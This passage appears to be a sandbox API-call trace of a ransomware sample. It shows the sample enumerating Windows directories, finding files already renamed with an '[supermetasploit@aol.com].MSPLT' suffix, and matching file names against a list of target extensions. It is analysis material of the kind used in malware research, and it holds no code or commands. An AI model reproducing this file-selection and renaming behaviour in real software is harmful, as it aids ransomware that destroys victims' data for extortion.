ftLastWriteTime.dwLowDateTime=0x5c5bbf52, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate7.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RO7226~1.MSP")) returned 1 [0284.583] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c5bbf52, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c5bbf52, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d02a6ab, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate8.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RO9AA5~1.MSP")) returned 1 [0284.583] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c5bbf52, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c5bbf52, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5cef92a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x564, dwReserved0=0x0, dwReserved1=0x0, cFileName="Save.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SAVEIC~1.MSP")) returned 1 [0284.583] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d2b2e6e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d2b2e6e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d371948, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9056, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPI~1.MSP")) returned 1 [0284.584] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5cf1f4e3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5cf1f4e3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5cf4564f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0x0, dwReserved1=0x0, cFileName="stop.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="STOPIC~1.MSP")) returned 1 [0284.584] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5cf4564f, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5cf4564f, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d3bddef, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SYSREQ~1.MSP")) returned 1 [0284.584] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d02a6ab, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d02a6ab, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d05094a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x574, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqNotMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SYSREQ~2.MSP")) returned 1 [0284.584] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d02a6ab, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d02a6ab, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d076957, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WARNIC~1.MSP")) returned 1 [0284.584] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d02a6ab, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d02a6ab, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d076957, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WARNIC~1.MSP")) returned 0 [0284.584] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0284.586] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.586] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c67ac9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf18, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="HEADER~1.MSP")) returned 1 [0284.586] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x60b7becf, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xadd3953, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NETFX_~2.MSP")) returned 1 [0284.586] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x5dfa99a7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x290310, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NETFX_~1.MSP")) returned 1 [0284.586] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d3bddef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d3bddef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5dcd4cff, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x11c108, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NETFX_~3.MSP")) returned 1 [0284.586] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x64cd8248, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x29e23d7, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NETFX_~4.MSP")) returned 1 [0284.587] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5dff5e21, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5dff5e21, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ef7853e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xd5110, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NE8255~1.MSP")) returned 1 [0284.587] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e0dacd5, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5e0dacd5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5e199931, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x79110, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NE4215~1.MSP")) returned 1 [0284.587] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c6c7188, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x427a6, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ParameterInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARAME~1.MSP")) returned 1 [0284.587] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e5ebd2f, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5e5ebd2f, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5e611ecc, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2d304, dwReserved0=0x0, dwReserved1=0x240000, cFileName="RGB9RAST_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RGB9RA~1.MSP")) returned 1 [0284.587] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e611ecc, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5e611ecc, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5e637fc7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17304, dwReserved0=0x0, dwReserved1=0x240000, cFileName="RGB9Rast_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RGB9RA~2.MSP")) returned 1 [0284.587] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e637fc7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5e637fc7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6066aedf, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13236, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Setup.exe.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPE~1.MSP")) returned 1 [0284.588] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6069103e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x6069103e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x60a24a0b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xc5252, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupEngine.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPE~2.MSP")) returned 1 [0284.588] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6079cf3d, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x6079cf3d, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6163672f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4824a, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPU~2.MSP")) returned 1 [0284.588] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c4f9718, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x769a, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUi.xsd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPU~1.MSP")) returned 1 [0284.588] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x616d0b3c, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x616d0b3c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6178dc76, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17854, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUtility.exe.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPU~3.MSP")) returned 1 [0284.588] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c4d017e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c4d017e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c5285f7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xa174, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SplashScreen.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SPLASH~1.MSP")) returned 1 [0284.588] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x616f53b4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x616f53b4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x61fbff66, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x23518, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sqmapi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SQMAPI~1.MSP")) returned 1 [0284.588] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c4fd117, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c4fd117, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c54a730, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x37fa, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Strings.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="STRING~1.MSP")) returned 1 [0284.589] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c54a730, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c54a730, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ce143ad, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x98e8, dwReserved0=0x0, dwReserved1=0x240000, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 1 [0284.589] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c56fcb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c56fcb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c713442, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1977e, dwReserved0=0x0, dwReserved1=0x240000, cFileName="watermark.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WATERM~1.MSP")) returned 1 [0284.589] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x63ed653b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x5b5241, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~1.MSP")) returned 1 [0284.589] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x639068f1, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2d764e, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~2.MSP")) returned 1 [0284.589] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x646238f8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x59b2fc, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~3.MSP")) returned 1 [0284.589] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x649b7104, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2cae27, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~4.MSP")) returned 1 [0284.590] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x649b7104, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2cae27, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~4.MSP")) returned 0 [0284.590] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0284.590] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0284.590] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0284.590] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0284.590] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x3947be8 [0284.622] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0284.622] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x6d72d3cf, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x6d72d3cf, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD", cAlternateFileName="")) returned 1 [0284.622] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0284.623] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0284.623] lstrlenW (lpString="BCD.LOG1") returned 8 [0284.623] lstrlenW (lpString=".1cd") returned 4 [0284.623] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0284.623] lstrlenW (lpString=".3ds") returned 4 [0284.623] lstrcmpiW (lpString1=".3ds", lpString2="LOG1") returned -1 [0284.623] lstrlenW (lpString=".3fr") returned 4 [0284.623] lstrcmpiW (lpString1=".3fr", lpString2="LOG1") returned -1 [0284.623] lstrlenW (lpString=".3g2") returned 4 [0284.623] lstrcmpiW (lpString1=".3g2", lpString2="LOG1") returned -1 [0284.623] lstrlenW (lpString=".3gp") returned 4 [0284.623] lstrcmpiW (lpString1=".3gp", lpString2="LOG1") returned -1 [0284.623] lstrlenW (lpString=".7z") returned 3 [0284.623] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0284.623] lstrlenW (lpString=".accda") returned 6 [0284.623] lstrcmpiW (lpString1=".accda", lpString2="D.LOG1") returned -1 [0284.623] lstrlenW (lpString=".accdb") returned 6 [0284.634] lstrcmpiW (lpString1=".accdb", lpString2="D.LOG1") returned -1 [0284.634] lstrlenW (lpString=".accdc") returned 6 [0284.634] lstrcmpiW (lpString1=".accdc", lpString2="D.LOG1") returned -1 [0284.634] lstrlenW 